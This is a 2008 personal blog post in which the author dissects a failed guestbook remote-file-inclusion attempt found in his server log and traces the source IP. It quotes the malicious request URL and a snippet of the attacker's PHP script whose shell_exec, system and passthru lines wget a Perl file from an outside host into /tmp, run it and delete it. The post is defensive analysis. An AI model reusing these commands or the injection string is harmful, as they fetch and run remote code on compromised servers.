Brian's Rant-o-Rama - provided free of charge provided you free me from charges

January 7^th, 2008

I want to state right off the bat that you needn't ever worry about divulging your IP address or any other information by coming to my website. That's because I am too cheap to get the advanced stats package from my webhosting company. So, all I get now is a gigantic impossible-to-read log of numbers that I never look at. And any data in it only lasts for 7 days anyhow—purged every Sunday. Visit any or all of my pages, download any or all content ... I won't know about it because I just don't care enough to make the effort to scour the mass of data to try and figure out who went where and looked at what. Life is just too short. Sorry, if that offends you, and you're welcome if you heartily approve.

Anatomy of a guestbook hack

I want to talk about something that caught my eye in my website's error log (something I check with about the same frequency that I wash my car, which is "very infrequently" :) ) It turns out that an automated tool went to my site and tried to install a link to a site that links to another site that scans people coming to my site for security vulnerabilities. Eh? (I hear you ask.) It's like this:

Step 1: Create a link to the installer code

OK, so as I said above, the only time I ever take notice of that log I mention is when something weird happens in it, and something weird most certainly did: Yesterday I got two requests in rapid succession for a PHP program (that doesn't exist) which looks as though it is part of a guestbook entry addition procedure:

/admin/addentry.php?phpbb_root_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 985

Since I wrote all my own homegrown code for my guestbook, the program it was trying to access doesn't exist, and the return code was 404 (as you can see). But if I did use the program addentry.php for my guestbook, and kept it in an /admin directory on my server (probably the default name and directory for some generic guestbook program), it would have responded to the GET request by adding a link to some code at another web address.

What the command was attempting to do was redirect my guestbook so that whenever people viewed the guestbook, it would attempt to run the script called phpbo.do at:

www.humanesociety.com/media/

I bet the Humane Society would be shocked to learn that their server had been hacked and was hosting some cracker code!

Fig. 1 - An attempt to compromise the guestbook by directly adding a malicious link.

Step 2: Install the malware

So I decided to look at the source code of the phpbo.do script. I won't burden you with all the code, but I will show a snippet to give an idea of what it looks like:

$dir = @getcwd(); eecho "BAGOL<br>"; $OS = @PHP_OS; eecho "OSTYPE:$OS<br>"; eecho "uname -a; $uname<br>"; ... sshell_exec('cd /tmp; wget http://www.paradiseradio.org/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt'); ... ssystem('cd /tmp;wget http://www.paradiseradio.org/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt'); ... ppassthru('cd /tmp;wget http://www.paradiseradio.org/help/css/ciak.txt;perl ciak.txt;rm -rf ciak.txt'); ...

Here's the bulk of what it does:

First it displays some information about the Web Server hosting the code, including free disk space. I guess the crackers want to know how many resources they are able to steal.

Then it downloads some PERL script found on yet another server (http://www.paradiseradio.org/help/css/). I am sure, just like the Humane Society, Paradise Radio would be surprised and unhappy to learn they were hosting cracker tools. In the code I show above it uses the wget command. It also attempts different commands for other versions of scripting languages (lwp-download, curl, fetch, etc.). This is so that the various different web hosts are all considered; if one line of code doesn't work, maybe the next one will.

Next, it calls PERL and executes that newly-downloaded script (more about that script below).

After that, it deletes the script off the server. See? It's cleaning up after itself to reduce the chance that someone in the Humane Society's IT department will notice unusual files on their server. (Their weblogs will show activity, but that might take hours, days, or weeks ... and by then a lot of malicious code could have been deployed.)

Fig. 2 - The malicious link placed in the guestbook calls a script on a hacked server, which subsequently downloads and runs another script from another hacked server to compromise the security of the computer visiting the guestbook.

Step 3: The payload is delivered

The text file that contains the code being downloaded from one server to another is called ciak.txt. Last night I downloaded it (as a text file only; I did not execute it!) and discovered it is a renamed version of a special program called a vulnerability scanner, this particular variety is named, VulnScan v.10 (crackers, for all their devious minds are clearly not the most creative geniuses when it comes to naming their scripts and programs—they are all business, which is actually kind of disturbing when you think about it). Here's a bit about these vulnerability scanners on Wikipedia.

In short: They scan computers for security vulnerabilities and:

Reports found vulnerabilities back to a specific computer at a specific IP address,

Exploit any of the vulnerabilities they are able to.

Aha, so now we get to the point. In cracker terms, this is "the payload". VulnScan is trying to probe the system of the person who visits my guestbook and tell the cracker (who set up this series of scripts) all about their computer (IP address, OS and version, installed security patches, etc.)

I won't show any of the code for this program at all, since it is too much like encouraging people. But, suffice to say, I read the code through and it is not a friendly little piece of code. If your system is not up-to-the-instant security patched, it might get a toehold and do something nasty, like:

Install a remote shell program or rootkit (gives crackers access to remotely forage through your hard drive for anything that might interest them).

Install programs that turn your computer into a "zombie", essentially turning it into a foot-soldier that attacks some other server (like Microsoft.com, Whitehouse.gov, Yahoo.com, etc.) overburdening them with requests, thus making them too busy to work.

Install a popup launcher so that you get constantly assaulted by popups for Viagra, Cialis, mortgage refinancing, or penis enlargement pills (no, I am not kidding).

Install a program that turns your computer into a "defacer"—that is, a program that attempts to hack into and destroy other websites.

Do you see how it would be your computer performing all these malicious activities after visiting my guestbook? Once the code was installed and running, you might notice nothing except a slow-down in your computer. And I would notice nothing at all unless I was actively looking for a compromised guestbook.

Step 4: Figuring out the source

So who is the arsehole responsible for this? Well, the short answer is: 69.61.30.100. But that isn't a whole lot of help, is it? :) And it's probably wrong anyhow.

69.61.30.100 is the IP address of the person who tried to install the link to the first server (which would try to install the vulnerability scanner from the other server).

So I did a DNS Query and got this information:
69.61.30.100 resolved to alpha.webserverdns.com DNS Query Results: ; <<>> DiG 9.1.3 <<>> any alpha.webserverdns.com ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5038 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;alpha.webserverdns.com. IN ANY ;; ANSWER SECTION: alpha.webserverdns.com. 14400 IN A 69.61.30.100 alpha.webserverdns.com. 14400 IN MX 0 alpha.webserverdns.com. alpha.webserverdns.com. 14400 IN TXT "v=spf1 a mx ~all" ;; AUTHORITY SECTION: webserverdns.com. 14400 IN NS ns1.webserverdns.com. webserverdns.com. 14400 IN NS ns2.webserverdns.com. ;; ADDITIONAL SECTION: alpha.webserverdns.com. 14400 IN A 69.61.30.100 ns1.webserverdns.com. 172795 IN A 69.61.37.247 ns2.webserverdns.com. 172795 IN A 208.101.27.152 ;; Query time: 89 msec ;; SERVER: 64.40.96.100#53(64.40.96.100) ;; WHEN: Mon Jan 7 13:25:40 2008 ;; MSG SIZE rcvd: 207
Here is the WHOIS for that IP address:
IP Whois Results: Connecting to whois.arin.net... Global Compass, Inc. NET-GLOBAL-COMPASS (NET-69-61-0-0-1) 69.61.0.0 - 69.61.127.255 Trusted IP networks TRUSTED-IP-NETWORKS-69-61-30-0-24 (NET-69-61-30-0-1) 69.61.30.0 - 69.61.30.255

Global Compass, eh? And who are they? According to their website, they provide "Internet Collocation for enterprises that seek performance advantages and cost-efficiency through the strategic outsourcing of their IT infrastructure."

Also, they own a block of IP addresses, 32 thousand in total. Hmm, that fact and the bloated marketynge-speak they use to describe themselves make them sound like an Internet Service Provider (ISP). This represents a dead end in my search. They clearly aren't the guilty party—they're just hosting webservers and web application servers. Unless I am some law enforcement officer and can get logs from them to tell me who was using that particular IP address at the time cited, I'm out of luck. They won't tell me and, in many countries, ISPs won't tell anyone who their clients are and what they are doing with their computers, no matter who is asking.

And there is another thing to consider: Let's say that Global Compass Inc. did give me the name and address of the computer at 69.61.30.100 and I decided to contact the owner. It would probably turn out that they were completely unaware they were trying to seed my guestbook with links to malicious scripts; they probably got compromised some time in the past themselves, and their computers were turned into guestbook-seeding zombies.

If that were the case, then I would have to read through the same kind of log I cited at the top of this blog entry and start working backwards again. And maybe again and again and again.

Conclusion

So, you might think this whole exercise in vivisection of a set of scripts is pointless and futile, since the scripts failed on my website and I never found out who was perpetrating it. But the crackers wouldn't be doing it if it weren't successful on someone's site somewhere, so the investigation was helpful—for me at least—by shedding some temporary light into the devious minds of the folks who are intent on cracking into peoples' computers. It's not just criminal, there's a social aspect to crackers, too: They have given up on the regular societal upstream swim and have instead created their own counter-culture of rebellion and cybercrime. I don't say this with admiration, by the way, but they are clearly not stupid people.

In the end, there's not a lot to say about them, except that I wish they could see things from a slightly bigger picture: Guestbook hacking is two-bit penny-ante stuff, really. They know their way around scripts, and they understand the architecture of webservers (and related commands) so they could probably do some so-called honest work employed by ISPs or other such companies. I work around dozens of people with the same skills, and they drive nice cars and live nice lifestyles.

And they don't need to hack other peoples' websites to do it.

Read more rants - - Comment on this rant - Email me